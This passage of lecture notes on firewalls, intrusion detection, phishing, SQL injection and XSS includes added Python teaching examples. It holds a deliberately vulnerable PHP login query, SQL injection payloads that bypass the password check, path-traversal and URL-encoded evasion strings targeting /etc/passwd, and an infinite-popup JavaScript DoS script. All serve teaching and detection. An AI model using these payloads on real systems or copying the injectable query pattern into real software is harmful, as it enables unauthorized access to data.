Stateless vs. Stateful Packet Filters
• Stateless: each packet is considered independently
  – But a single packet may not contain sufficient data to make a solid access control decision.
  – e.g., whether a TCP packet is part of an established session.
• Stateful: allows historical context to be considered
  – Records outgoing packets and links incoming packets to the state of their corresponding outbound packet.
  – More intelligent and provides stronger security by understanding the flow of traffic over time, not just snapshots of individual packets.
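Added example (not from the lecture): the same inbound decision made by a stateless filter, which can only look at the TCP flags in the packet in front of it, and by a stateful one, which consults a table of the connections it saw leave the network. The traffic and the internal prefix are constructed.

```python
# Added example: stateless (flag-based) vs stateful (flow-table) inbound filtering.
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset   # e.g. {"SYN"}, {"SYN", "ACK"}, {"ACK"}


INTERNAL_PREFIX = "10.0.1."          # constructed internal network


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIX)


def stateless_inbound_allow(seg: Segment) -> bool:
    """Classic stateless rule: pass inbound TCP if ACK is set ('part of an established
    connection'), block bare SYNs. The ACK bit is attacker-controlled, so this is a guess."""
    return "ACK" in seg.flags


class StatefulFilter:
    def __init__(self):
        self.flows = set()           # (client_ip, client_port, server_ip, server_port)

    def handle(self, seg: Segment) -> bool:
        outbound = is_internal(seg.src) and not is_internal(seg.dst)
        if outbound:
            if "SYN" in seg.flags and "ACK" not in seg.flags:
                self.flows.add((seg.src, seg.sport, seg.dst, seg.dport))   # remember the flow
            return True               # policy: internal hosts may initiate anything
        # inbound: allowed only if it answers a flow this filter saw go out
        return (seg.dst, seg.dport, seg.src, seg.sport) in self.flows


# Constructed traffic.
SYN_OUT = Segment("10.0.1.5", 40000, "93.184.216.34", 80, frozenset({"SYN"}))
REPLY = Segment("93.184.216.34", 80, "10.0.1.5", 40000, frozenset({"SYN", "ACK"}))
FORGED = Segment("198.51.100.9", 80, "10.0.1.5", 40000, frozenset({"SYN", "ACK"}))  # unsolicited
BARE_SYN_IN = Segment("198.51.100.9", 80, "10.0.1.5", 40000, frozenset({"SYN"}))
```

The forged segment is exactly what an ACK scan sends: the stateless rule waves it through because the flag looks right, while the stateful filter rejects it because no internal host ever opened that flow. Real stateful filters also age entries out and track sequence numbers, which this model omits.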
Application Layer Firewall
• Understands application layer protocols
• Can do
  – email scanning, filtering
  – scrub web pages, e.g., remove JavaScript
  – much more
Firewall Effectiveness
• Can a firewall protect against
  – malware spread through email?
  – a web server vulnerability?
  – DNS flaws?
• Sure, if you turn these services off
  – William Cheswick: "best firewall: a pair of scissors", meaning that you completely cut off a service
• Is this realistic?
Firewall Effectiveness
• Firewalls
  – cannot protect against malicious insiders
  – cannot protect against connections that don't go through them
  – cannot protect against completely new threats
  – cannot protect fully against viruses
• "hard crunchy outside, soft chewy inside"
  – from RFC 1636
From IDS to Security Intelligence
The Road to Better Situational Awareness
• Intrusion Detection Systems (1990)
  – Network flows, host intrusion detection logs, etc.
• Security Information and Event Management (SIEM) (mid-2000s)
  – Alarm correlation, incident response
• Big Data Security/Analytics (now)
  – Variety of data, security intelligence
Intrusion
• Intrusion
  – "an Intrusion is unauthorized access to and/or activity in an information system."
  – if an authorized action … exploits a vulnerability … causes a compromise … it becomes a successful attack/intrusion
    • an outsider gained access to a protected resource
    • a buffer overflow has been exploited to execute attack code inside a legitimate program
    • a program or file has been modified
    • the system is not behaving "as it should"
Intrusion
• What is an intrusion?
  – remote root compromise
  – web server defacement
  – guessing/cracking passwords
  – copying databases containing credit card numbers
  – viewing sensitive data without authorization
  – running a packet sniffer
  – distributing pirated software
  – using an unsecured modem to access the internal network
  – impersonating an executive to get information
  – using an unattended workstation
Intrusion Detection
• Intrusion Detection [RFC 2828]
  – a security service that monitors and analyzes system events for the purpose of finding, and providing real-time or near real-time warning of, attempts to access system resources in an unauthorized manner
• Intrusion Prevention
  – an extension of ID that also exercises access control to protect computers from exploitation
Intrusion Detection Systems
(architecture figure)
• An IDS comprises three logical components:
  – sensors
    • collect data: packets, logs, system call traces, etc.
  – analyzers
    • determine if an intrusion has occurred
  – user interface
    • view output or control system behavior
(analyzer pipeline figure: audit records → audit data preprocessor → activity data → detection engine, driven by detection models → alarms → decision engine, driven by a decision table → action/report)
IDS Principles
• An IDS assumes that intruder behavior differs from that of legitimate users
• Overlap in behaviors causes problems
  – false positives or false alarms
  – false negatives
Bayesian Detection Rate
• Formal model:
  – Two random variables, given an event
    • A denotes that an Alarm is generated
    • I denotes that the event is indeed an Intrusion
  – detection rate (true positive rate): P(A|I)
  – so the false negative rate is P(!A|I)
  – false positive rate: P(A|!I)
  – so the true negative rate is P(!A|!I)
  – Bayesian detection rate: P(I|A)
    • given an alarm, how likely is it a real intrusion?
Base-rate Bayesian Fallacy
• According to Bayes' rule:
  $$\Pr(I \mid A) = \frac{\Pr(A \mid I)\,\Pr(I)}{\Pr(A)}$$
• If we know
  – $\Pr(I)$: the attack probability
    • assume 1 attack every 10,000 uses, $\Pr(I) = 0.0001$
  – $\Pr(A)$: probability of an alarm (unknown!)
    • Law of total probability: $\Pr(A) = \Pr(A \mid I)\Pr(I) + \Pr(A \mid \neg I)\Pr(\neg I)$
• First, assume the IDS is 99% accurate
  – $\Pr(A \mid I) = 0.99$
  – $\Pr(\neg A \mid I) = 1 - \Pr(A \mid I) = 0.01$
  – $\Pr(\neg A \mid \neg I) = 0.99$
  – $\Pr(A \mid \neg I) = 0.01$
• $\Pr(A) = 0.99 \times 0.0001 + 0.01 \times 0.9999 = 0.010098$
• Now:
  $$\Pr(I \mid A) = \frac{0.99 \times 0.0001}{0.010098} \approx 0.0098 = 0.98\%$$
• Implications:
  – a 99% accurate detector only leads to about 1% of alarms being real intrusions
    • roughly 100 false alarms per true alarm (exactly $0.009999 / 0.000099 \approx 101$)
  – This is a core problem with IDS!
  – Need suppression of false alarms
    • however difficult!
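Added example (not from the lecture): the base-rate computation above as functions, plus the inverse question a practitioner actually faces when tuning an IDS: given the attack base rate, how low must the false-positive rate be before an alarm is worth an analyst's time? The numbers in the assertions are the slide's (1 attack in 10,000, a 99% accurate detector).

```python
# Added example: Bayesian detection rate and the false-positive budget it implies.

def p_alarm(p_i: float, tpr: float, fpr: float) -> float:
    """Law of total probability: Pr(A) = Pr(A|I)Pr(I) + Pr(A|not I)Pr(not I)."""
    return tpr * p_i + fpr * (1 - p_i)


def bayesian_detection_rate(p_i: float, tpr: float, fpr: float) -> float:
    """Pr(I|A): the fraction of alarms that are real intrusions (precision)."""
    return tpr * p_i / p_alarm(p_i, tpr, fpr)


def false_alarms_per_true_alarm(p_i: float, tpr: float, fpr: float) -> float:
    """Ratio of false alarms to true alarms, the number an analyst experiences."""
    return fpr * (1 - p_i) / (tpr * p_i)


def max_fpr_for_precision(p_i: float, tpr: float, target: float) -> float:
    """Solve Pr(I|A) = target for the false-positive rate: the FPR budget for a
    detector that must be right `target` of the time when it fires."""
    return tpr * p_i * (1 - target) / (target * (1 - p_i))


def precision_table(p_i: float, tpr: float, fprs):
    """(fpr, Pr(I|A)) pairs, for sweeping a threshold and reading off the trade-off."""
    return [(fpr, bayesian_detection_rate(p_i, tpr, fpr)) for fpr in fprs]
```

`max_fpr_for_precision` makes the "however difficult!" on the slide quantitative: at the slide's base rate, even a 50% precision target needs a false-positive rate below 0.0001, and the base rate, not the detector, is what drives that number. Raising `p_i` by only alerting on traffic that is already suspicious (correlation, whitelisting, context) is therefore the lever that SIEM and security-intelligence systems pull.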
Intrusion Detection Approaches
• Anomaly detection
  – detects activity that deviates from normal behavior
  – defines a profile describing "normal" behavior
    • involves the collection of data relating to the behavior of legitimate users over a period of time
  – detects potential attacks
    • analyzes the observed behavior to decide whether it is that of a legitimate user or of an intruder
(figure: activity measures compared against the profile; deviations flagged as probable intrusion)
• Anomaly detection
  – Model legitimate user behavior in a training phase
    • A variety of classification approaches
    • Statistical
      – analyzes observed behavior using univariate, multivariate, or time-series models
    • Knowledge based
      – uses a rule-based expert system to classify behaviors
    • Machine learning
      – Neural network models trained on normal and malicious network behaviors can autonomously distinguish between benign and harmful patterns, using data mining to uncover hidden correlations.
      – Once trained, can classify new data as normal or anomalous based on learned patterns.
    • Trade-off between efficiency and cost of detection
Intrusion Detection Approaches
• Signature/heuristic detection
  – uses a large set of known malicious data patterns (signatures) or attack rules (heuristics)
    • only identifies known attacks for which it has patterns or rules
  – compares them with current behavior
    • mostly accurate
(figure: intrusion patterns, e.g., sequences of system calls or patterns of network traffic, pattern-matched against observed activities)
Intrusion Detection Approaches
• Signature approaches
  – widely used in anti-virus products, network traffic scanning proxies, and NIDS
  – designed to minimize false alarms by matching very specific known malicious patterns
  – accurate for known threats but ineffective for new ones
• Rule-based heuristic identification
  – define identified suspicious behavior in rules
    • rules are system-specific, attack-specific
  – can identify new threats by recognizing suspicious behavior but may yield more false positives if rules are unclear
  – E.g., Snort
Detection Quality
• FP is more severe in statistical anomaly detection (anything out of the ordinary might be flagged as a threat)
• FN is more severe in signature-based detection (it looks for specific patterns or signatures of attacks and may overlook new or varied attacks it doesn't recognize)
• An IDS with too many errors becomes useless.
Network-based IDS Example: SNORT
• Snort is a lightweight NIDS
  – rule based
    • first released in 1997 but still updated/maintained today
    • easily configured
  – easily deployed on nodes
    • can be run as a sniffer (IDS) or inline (IPS)
  – real-time packet capture, uses a small amount of memory and processor time
    • 1 CPU with 1000 signatures can process 500 Mbps
      – not great, getting faster now
(Snort rule example figure)
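Added example (not from the lecture and not Snort's own code): a matcher for a small subset of the Snort rule language (the header plus the `msg`, `content` and `sid` options), run over constructed HTTP packets. The fourth packet carries the same path-traversal attack URL-encoded, which the signature misses; real Snort normalizes HTTP URIs in its preprocessor precisely because of this, and the example leaves that out to show the false negative the "Detection Quality" slide describes. The supported syntax (no `nocase`, no `|hex|` content, no `;` inside quoted strings) is an assumption of the example.

```python
# Added example: minimal Snort-style signature matcher and a signature evasion.
import re
from dataclasses import dataclass

HEADER_RE = re.compile(r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+->\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$")


@dataclass(frozen=True)
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    dst: str
    dport: str
    msg: str
    content: bytes
    sid: int


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


def parse_rule(text: str) -> Rule:
    """Parse 'action proto src sport -> dst dport (msg:"..."; content:"..."; sid:N;)'."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("unsupported rule syntax: " + text)
    action, proto, src, sport, dst, dport, opts = m.groups()
    fields = {}
    for opt in filter(None, (o.strip() for o in opts.split(";"))):
        key, _, val = opt.partition(":")
        fields[key.strip()] = val.strip().strip('"')
    return Rule(action, proto.lower(), src, sport, dst, dport,
                fields.get("msg", ""), fields["content"].encode(), int(fields["sid"]))


def _m(pattern: str, value) -> bool:
    return pattern == "any" or str(pattern) == str(value)


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    return (rule.proto == pkt.proto and _m(rule.src, pkt.src) and _m(rule.sport, pkt.sport)
            and _m(rule.dst, pkt.dst) and _m(rule.dport, pkt.dport)
            and rule.content in pkt.payload)          # exact, case-sensitive byte match


def scan(rules, packets):
    """Return (packet index, sid, msg) for every rule that fires on every packet."""
    return [(i, r.sid, r.msg) for i, p in enumerate(packets) for r in rules if rule_matches(r, p)]


RULES = [parse_rule(t) for t in (
    'alert tcp any any -> any 80 (msg:"Directory traversal attempt"; content:"../"; sid:1000001;)',
    'alert tcp any any -> any 80 (msg:"SQL injection UNION SELECT"; content:"UNION SELECT"; sid:1000002;)',
)]

# Constructed traffic to the 10.0.0.10 web server from the firewall slides.
_SRV = ("tcp", "203.0.113.7", 51234, "10.0.0.10", 80)
PACKETS = [
    Packet(*_SRV, b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n"),
    Packet(*_SRV, b"GET /../../etc/passwd HTTP/1.1\r\nHost: example\r\n\r\n"),
    Packet(*_SRV, b"GET /search?q=1 UNION SELECT password FROM users HTTP/1.1\r\n\r\n"),
    Packet(*_SRV, b"GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1\r\nHost: example\r\n\r\n"),  # evades
]
```

This is the whole signature trade-off in one run: the two rules fire only on the exact bytes they were written for, so the hit list has no false positives, and the encoded traversal in packet 3 is a silent false negative. Anomaly detection would flag that request only if `%2e` sequences were unusual for this server, which is a statement about the baseline, not about the attack.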
IDS
• Requirements
  – run continually
  – be fault tolerant
  – resist subversion
  – impose a minimal overhead on the system
  – be configured according to system security policies
  – adapt to changes in systems and users
  – scale to monitor large numbers of systems
  – provide graceful degradation of service
  – allow dynamic reconfiguration
IDS vs. Firewall/IPS
• Network IDS
  – Passive monitoring
  – Fail-open: if the IDS fails, traffic keeps flowing unobserved
• Firewall/IPS
  – Active filtering
  – Fail-closed: if it fails, no data gets in!
Security Intelligence
• Data-driven information security
  – bank fraud detection: credit companies have done this for decades.
  – anomaly-based intrusion detection systems.
• Custom-built infrastructure to mine Big Data for fraud detection was not cost-effective to scale or adapt for other fraud detection uses.
• Commercially available Big Data tools and techniques are now bringing attention to analytics for fraud detection in healthcare, insurance, and other fields.
Data Analytics for Intrusion Detection
• Traditional techniques vs. Big Data
  – Storing large amounts of data was not cost-effective, leading to the deletion of most logs and computer activity after a fixed retention period (e.g., 60 days).
  – Performing analytics and complex queries on large, structured data sets was inefficient.
  – Traditional tools were not designed to analyze and manage unstructured data.
  – Big Data tools (e.g., Pig Latin scripts and regular expressions) can query data in flexible formats.
  – Big Data systems use cluster computing infrastructures that are reliable and available.
Data Analytics for Intrusion Detection
• Security intelligence with big data
  – collecting data at a massive scale from many internal enterprise sources and external sources such as vulnerability databases.
  – performing deeper analytics on the data.
  – providing a consolidated view of security-related information.
  – achieving real-time analysis of streaming data.
  – Big Data tools still require system architects and analysts to have a deep knowledge of their system in order to properly configure the Big Data analysis tools.

Security Intelligence
Traditional Systems:
• More rigid, predefined schemas
• Data gets deleted
• Complex analyst queries take long to complete
Big Data Promise:
• Structured and unstructured data treated seamlessly
• Keep data for historical correlation (e.g., 10 years)
• Faster query response times

Machine Learning for Security
• Classification (Supervised Learning):
– A machine learning algorithm used to categorize data points into predefined classes or categories based on their features.
• Can be used for:
– Intrusion detection, anomaly detection
– Spam filtering
– Software analysis/testing
– Virus/malware detection
– User behavioral analysis
• Classification (Supervised Learning) for Security (figure)
• Deep neural networks (DNNs) for Security
– Intrusion detection, anomaly detection
– Deep packet inspection
– Feature learning
– Adaptive defense
– Real-time detection

Example: IBM’s Security Intelligence
• Predictive analytics, prioritized threat data, proactive response
– Multi-vendor event correlation
– Global monitoring
– Threat prioritization
– Sophisticated intelligence reporting
– Real-time analysis
– Automated Intelligence

Example: Zions Bancorporation
• National bank headquartered in Salt Lake City, Utah.
• Using Hadoop clusters and business intelligence tools to parse more data more quickly than with traditional SIEM tools.
– traditional system: searching among a month’s load of data could take 20 minutes to an hour.
– new Hadoop system running queries with Hive: gets the same results in about one minute.
– incorporates unstructured and multiple disparate data sets into a single analytical framework.

Example: APT
• Advanced Persistent Threat (APT)
– Among the most serious information security threats that organizations face today.
– Operated by sophisticated attackers targeting specific organizations’ high-value assets, often spanning months or years.
– Has become highly sophisticated and diverse in technologies, especially in leveraging social engineering to exploit an organization’s employees and penetrate IT systems
• spear-phishing messages that are customized for each victim (e.g., emails, SMS, and PUSH messages); specially crafted malware that may contain zero-day exploits
• Advanced Persistent Threat (APT)
– detection relies heavily on the expertise of human analysts
– analysts write custom signatures (unique patterns developed to detect unrecognized suspicious or malicious activities) and perform manual investigation
– labor-intensive, difficult to generalize, and not scalable
– existing anomaly detection proposals commonly focus on obvious outliers (e.g., volume-based), but are ill-suited for stealthy APT attacks and suffer from high false positive rates

APT detection
• Large-scale distributed computing for APT detection
• MapReduce paradigm
– More efficiently handles highly unstructured data with arbitrary formats that are captured by many types of sensors (e.g., Syslog, IDS, Firewall, NetFlow, and DNS) over long periods of time
– Massive parallel processing mechanism: use much more sophisticated detection algorithms than the traditional SQL-DBMS (transactional workloads with highly structured data)
– Users have the power and flexibility to incorporate any detection algorithms into the Map and Reduce functions
– Potential to help analyze more data at once, to cover more attack paths and possible targets, and to reveal unknown threats using machine learning techniques
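As an added example (not from the lecture), here is the MapReduce pattern of these two slides in plain Python: the sensor-specific parsing is the detection logic plugged into the map step, and the cross-sensor correlation is the reduce step. The log lines, their formats, the hosts and the two-sensor threshold are all constructed for this example.

```python
import re
from collections import defaultdict

# Constructed records from three sensor types, each in its own text format
# (the "arbitrary formats" the slide mentions). Addresses are private space
# and an RFC 5737 test range; hosts, users and ports are made up.
SENSOR_RECORDS = [
    ("syslog", "Mar 3 02:14:07 ws17 sshd[812]: Failed password for admin from 10.0.5.23"),
    ("firewall", "DENY TCP 10.0.5.23:51022 -> 203.0.113.9:4444"),
    ("dns", "query 10.0.5.23 a7x9q.updates-cdn.example TXT"),
    ("syslog", "Mar 3 02:15:11 ws17 sshd[813]: Failed password for root from 10.0.5.23"),
    ("firewall", "DENY TCP 10.0.7.4:40110 -> 203.0.113.9:4444"),
    ("dns", "query 10.0.9.8 www.example.org A"),
    ("syslog", "Mar 3 02:16:40 ws02 sshd[99]: Accepted password for bob from 10.0.9.8"),
]

IPV4 = r"(\d+\.\d+\.\d+\.\d+)"
# Sensor-specific patterns: the detection logic plugged into the map step.
PATTERNS = {
    "syslog": re.compile(r"Failed password for (\S+) from " + IPV4),
    "firewall": re.compile(r"DENY \w+ " + IPV4 + r":\d+ -> \S+:(\d+)"),
    "dns": re.compile(r"query " + IPV4 + r" (\S+) TXT$"),  # TXT lookups only
}


def map_record(sensor, line):
    """Map step: emit (source_ip, (sensor, detail)) for suspicious records;
    benign ones (accepted logins, ordinary A lookups) emit nothing."""
    match = PATTERNS[sensor].search(line)
    if not match:
        return []
    if sensor == "syslog":
        user, ip = match.groups()
        return [(ip, ("syslog", f"failed login as {user}"))]
    if sensor == "firewall":
        ip, port = match.groups()
        return [(ip, ("firewall", f"denied egress to port {port}"))]
    ip, name = match.groups()
    return [(ip, ("dns", f"TXT query for {name}"))]


def shuffle(pairs):
    """Group mapped values by key, as the framework does between the phases."""
    grouped = defaultdict(list)
    for key, value in pairs:
        grouped[key].append(value)
    return grouped


def reduce_host(ip, observations, min_sensors=2):
    """Reduce step: flag a host only when independent sensors all saw it,
    so one noisy sensor alone does not raise an alert."""
    sensors = {sensor for sensor, _ in observations}
    if len(sensors) < min_sensors:
        return None
    return {"ip": ip, "sensors": sorted(sensors), "events": len(observations)}


def run_pipeline(records, min_sensors=2):
    """Map every record, shuffle by source IP, reduce once per host."""
    mapped = [kv for sensor, line in records for kv in map_record(sensor, line)]
    flagged = [reduce_host(ip, obs, min_sensors) for ip, obs in shuffle(mapped).items()]
    return sorted((f for f in flagged if f), key=lambda f: f["ip"])


if __name__ == "__main__":
    for hit in run_pipeline(SENSOR_RECORDS):
        print(hit)
```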

Application Security
• Web Security
– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

Web Security Vulnerabilities
(figure) Website statistics report from WhiteHat Security: website vulnerabilities among 7,000 websites analyzed in 2011
• Open Web Application Security Project (OWASP)
– software security improvement nonprofit organization
– provides free and open resources, tools, and best practices for web application security
– known for its OWASP Top 10, a regularly updated list of the ten most critical web application security risks
– Source: https://owasp.org/www-project-top-ten/

Phishing
http://67.15.76.201/~guru/negotiations.html
(screenshots of phishing pages)

Phishing
• Very simple examples
• They’re getting more sophisticated
– better copies of pages
– URL tricks, e.g. http://www.cnn.com&story=breaking_news@18.69.0.44/evarady/www/story.htm
• It’s hard for us to distinguish
• Think about the average computer user
• How much does your net security depend on users?

Spoofing Location Bar
• Phisher:
– Open a new window
– Remove location field from new window
– Draw a fake location field which shows the spoofed location

Repository of Phishing Sites
• Phish Tank
• http://www.phishtank.com/

Phish Tank
(screenshots of the Phish Tank site)

Detected by Browsers
(screenshot of a browser’s phishing warning)

Application Security
• Web Security
– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

Relational Databases
• A type of database that stores and provides access to data points related to one another
• Essential for organizing and managing large volumes of data efficiently
• Data is organized in tables (rows and columns)
• Uses Structured Query Language (SQL) for data querying and manipulation
• Examples:
– MySQL, PostgreSQL, Oracle Database, Microsoft SQL Server.
(figure: a relational database)

Relational Databases
Name     Zipcode  Age  Sex  Disease
Alice    47677    29   F    Ovarian Cancer
Betty    47602    22   F    Ovarian Cancer
Charles  47678    27   M    Prostate Cancer
David    47905    43   M    Flu
Emily    47909    52   F    Heart Disease
Fred     47906    47   M    Heart Disease
Releasing medical datasets: any issues?

SQL
• Stands for Structured Query Language
– Standardized programming language for managing and manipulating relational databases.
– Enables us to create, modify, and query databases, e.g., inserting, updating, deleting, and retrieving data from databases.
(figure callout) Select all records from the 'users' table, limited to showing just the first 30 results.

Web Security: Concepts & Terminology
• HTML (Hypertext Markup Language)
– Used to structure the content of web pages.
– JavaScript can manipulate HTML dynamically to change content, styles, or layout based on user interactions or other events.
• JavaScript and PHP are both programming languages commonly used in web development, but they serve different purposes and operate on different parts of a web application.

Web Security: Concepts & Terminology
• Cookies
– Small pieces of data stored on the user's browser by websites they visit. Designed for websites to remember stateful information, such as
• items added to the shopping cart in an online store
• record of the user's browsing activity, including clicking particular buttons, logins, and visited pages
– Commonly used for session management, user authentication, and tracking user preferences.
– Often store session data that verifies the identity of the user without needing to log in again. (How is this possible?)
– JavaScript and PHP can manage cookies to read, write, and delete cookie data.
– Can be exploited in XSS attacks when they contain sensitive information.

Web Security: Concepts & Terminology
• JavaScript
– A client-side scripting language used to add interactivity and dynamic behavior to web pages.
– Runs in the user's browser and can manipulate HTML dynamically.
– Can interact with cookies stored in the user's browser, allowing for operations such as reading, writing, and deleting cookie data.
– JavaScript can also be exploited in XSS attacks when injected into a web page to execute malicious scripts in the context of other users' sessions.
• PHP (Hypertext Preprocessor)
– A server-side scripting language used to build dynamic web pages and web applications.
– Runs on the web server and generates HTML content dynamically, which is then sent to the user's browser.
– Can interact with databases, such as MySQL or PostgreSQL, to retrieve or store data.
– Can handle cookies, both for reading and setting values, often used for user session management.
– PHP applications are vulnerable to SQL injection attacks due to improper input sanitization, enabling attackers to manipulate queries for data extraction or modification.

Web Security: Concepts & Terminology
• SQL Injection Attack
– Occurs when attackers manipulate SQL queries executed by a web application's backend database.
– Attackers can extract sensitive data from the database, modify or delete data, execute administrative operations, or even take control of the entire application or server.
– PHP applications are commonly vulnerable to SQL injection attacks
• when they construct SQL queries using user-controlled input without proper input sanitization (cleaning or filtering the input to prevent malicious data from being processed as part of the HTML)
• SQL Injection Attack: Example
– A PHP-based web application accepts user input to search for products in a database.
– The application constructs SQL queries dynamically using the user input without proper sanitization.
– An attacker exploits this vulnerability by submitting malicious input containing SQL code.
– The attacker's input modifies the SQL query to retrieve sensitive information from the database.

Web Security: Concepts & Terminology
• XSS (Cross-Site Scripting) Attack
– Occurs when attackers inject malicious scripts (usually JavaScript) into web pages viewed by end-users.
– JavaScript is commonly used to execute XSS attacks by injecting scripts that steal cookies, redirect users to malicious websites, hijack user sessions, deface websites, or perform other unauthorized actions on behalf of the victim.
– PHP applications can also be vulnerable to XSS attacks when they output user-controlled data without proper input sanitization, allowing attackers to inject malicious scripts.
• XSS (Cross-Site Scripting) Attack: Example
– A PHP-based web application allows users to post comments on a forum.
– The application uses JavaScript to display these comments dynamically without proper input sanitization.
– An attacker exploits this vulnerability to inject malicious JavaScript code into a comment.
– When other users view the comment, the malicious JavaScript code executes in their browsers, potentially stealing their session cookies or performing other malicious actions.
• Interconnections of Terminologies
– In both attack examples, web application vulnerabilities are exploited by attackers for malicious actions.
– JavaScript, PHP, and cookies are integral to web development, and vulnerabilities in these components can lead to security breaches such as XSS or SQL injection attacks.
– Proper input validation/sanitization, output encoding, and security measures are essential to mitigate risks and protect web applications and user data.

SQL Injection
<form action="user.php" method="post">
  Username: <input type="text" name="uname"><br>
  Password: <input type="password" name="pwd"><br>
  <input type="submit">
</form>
• Backend (server-side) database (figure)

SQL Injection
(screenshot callouts) This script outputs results of a SQL query executed on a server-side database. Enter user input. The query gets the record of the user. Wrong username and/or password.
(screenshot callouts) This is the correct password. Display user information.

SQL Injection
<?php
$user=$_POST["uname"];
$pass=$_POST["pwd"];

//connect to DB………..

// The user-supplied values are spliced straight into the SQL text
$query = "SELECT * FROM users WHERE uname='$user' AND passwd=PASSWORD('$pass')";

echo "<br>Will send this query: <br>".$query."<br><br>";

$result = mysql_query($query) or die('Query failed: ' . mysql_error());

if (mysql_num_rows($result)==0) {
    echo "Wrong Username/Password combination. <br> Access Denied<br>";
} else {
    echo "user found";
}

// Printing results in HTML
echo "<br><br><table border=1>\n";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
    echo "\t<tr>\n";
    foreach ($line as $col_value) {
        echo "\t\t<td>$col_value</td>\n";
    }
    echo "\t</tr>\n";
}
echo "</table>\n";

SQL Injection
• This code snippet demonstrates an insecure approach to handling user authentication.
• Q: how can we manipulate the query?
SELECT *
FROM users
WHERE uname='$user'
AND passwd=PASSWORD('$pass')
• With user input:
SELECT *
FROM users
WHERE uname='robert'
AND passwd=PASSWORD('robert')

SQL Injection
• What if we include a ' in the input to end the string?
SELECT *
FROM users
WHERE uname='robert' '
AND passwd=PASSWORD('$pass')
(callout) The extra ' causes the string to end before intended; anything after it is treated as separate from the string.

SQL Injection
• Need to terminate the rest of the query. How?
SELECT *
FROM users
WHERE uname='robert' # '
AND passwd=PASSWORD('$pass')
• The new query logic:
SELECT *
FROM users
WHERE uname='robert'
(screenshot of the result)

SQL Injection
• Need to terminate the rest of the query. How?
SELECT *
FROM users
WHERE uname='robert' # '
AND passwd=PASSWORD('$pass')
(callout) You can add your own query logic after the terminated string….
• Add other query logic…
SELECT *
FROM users
WHERE uname='robert' OR true # '
AND passwd=PASSWORD('$pass')
(screenshot of the result)

SQL Injection
• Add other query logic…
SELECT *
FROM users
WHERE uname='0' OR first LIKE 'Jam%' # '
AND passwd=PASSWORD('$pass')

SQL Injection
• SQL Injection
– Effectively changes the query logic
– May execute shell commands (needs support from the database server)
– Responsible for many password breaches
• E.g. Yahoo! Email password disclosure in 2012
– Controls
• Prepared statements – first define the query logic (build the query tree), then pass parameters
• Escaping: disallow certain characters that could be used maliciously in user input
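The string-built query from the slides beside the prepared-statement control, as an added example that is not the lecture's code: the PHP login query is rebuilt in Python on an in-memory SQLite database. Two details differ from the slides and are assumptions of this example: SQLite has no PASSWORD() function, so a SHA-256 digest computed in the application stands in for it, and SQLite comments start with -- rather than MySQL's #.

```python
import hashlib
import sqlite3


def _pw(password):
    """Stand-in for MySQL's PASSWORD(): an unsalted SHA-256 hex digest, used
    only so the query has the slide's shape (not a real password hash)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed users table with two accounts; columns mirror the slides."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, first TEXT, passwd TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("robert", "Robert", _pw("robert")),
        ("james", "James", _pw("s3cret!")),
    ])
    return db


def build_query(user, password):
    """What the slide's PHP echoes as 'Will send this query': the username is
    pasted into the SQL text, so a quote in it ends the string literal and a
    comment marker drops everything after it, including the password check."""
    return (f"SELECT uname FROM users WHERE uname='{user}' "
            f"AND passwd='{_pw(password)}'")


def login_vulnerable(db, user, password):
    """Executes the string-built query exactly as assembled."""
    return [row[0] for row in db.execute(build_query(user, password))]


def login_prepared(db, user, password):
    """The control from the slide: the query logic is fixed first, then the
    values are bound as parameters and can never be parsed as SQL."""
    query = "SELECT uname FROM users WHERE uname=? AND passwd=?"
    return [row[0] for row in db.execute(query, (user, _pw(password)))]


if __name__ == "__main__":
    db = make_db()
    for user in ("robert", "robert' --", "0' OR first LIKE 'Jam%' --"):
        print(build_query(user, "wrong"))
        print("  vulnerable:", login_vulnerable(db, user, "wrong"),
              " prepared:", login_prepared(db, user, "wrong"))
```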

Malicious Content Injection
(screenshots) Send a message to James. James logs in; the message is displayed.

Malicious Content Injection
• Maybe I can send some FUN stuff…
• Javascript
– A scripting language used to improve the quality of webpages
• Create dialogs, forms, graphs, …
• Built upon API functions
– Should have NO ability to read local files, or open connections
– However, it’s the source of most recent security holes in Firefox and IE:
• DoS – the infinite popup script
• Spoofing – easy to create password dialogs
• What if I send:
<script language="javascript">
function popup(){
  while (1 == 1) {
    window.open("http://www.yahoo.com");
  }
}
</script>

Cookies
• Let’s dig further… How is this possible?
• A cookie is a file created by a website to store user information on the user's browser.
• Offload server state to browsers.
• Contains information that the server can use to remember you, e.g., a unique session identifier for session management.
(figure) Browser → Server: enters form data. Server → Browser: stores cookie; it includes domain (who can read it), expiration, and “secure” (can be read only over SSL). Later, Browser → Server: requests with the cookie. Server → Browser: returns data.
HTTP is a stateless protocol; cookies add state.
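An added example (not from the lecture) that turns the three cookie attributes named above, domain, expiration and “secure”, into a check a site operator can run on a Set-Cookie header. It goes one step beyond the slide by also checking HttpOnly, the flag that keeps a cookie out of document.cookie in the slides that follow. The headers, the host name, the fixed date and the 30-day limit are constructed.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed Set-Cookie headers as a server at www.example.com might send
# them, and a fixed "now" so the expiry arithmetic is reproducible.
NOW = datetime(2026, 1, 1, tzinfo=timezone.utc)
WEAK_COOKIE = ("sessionid=abc123; Domain=.example.com; "
               "Expires=Mon, 21 Oct 2030 07:28:00 GMT")
STRONG_COOKIE = ("sessionid=abc123; Secure; HttpOnly; "
                 "Expires=Thu, 15 Jan 2026 00:00:00 GMT")


def parse_set_cookie(header):
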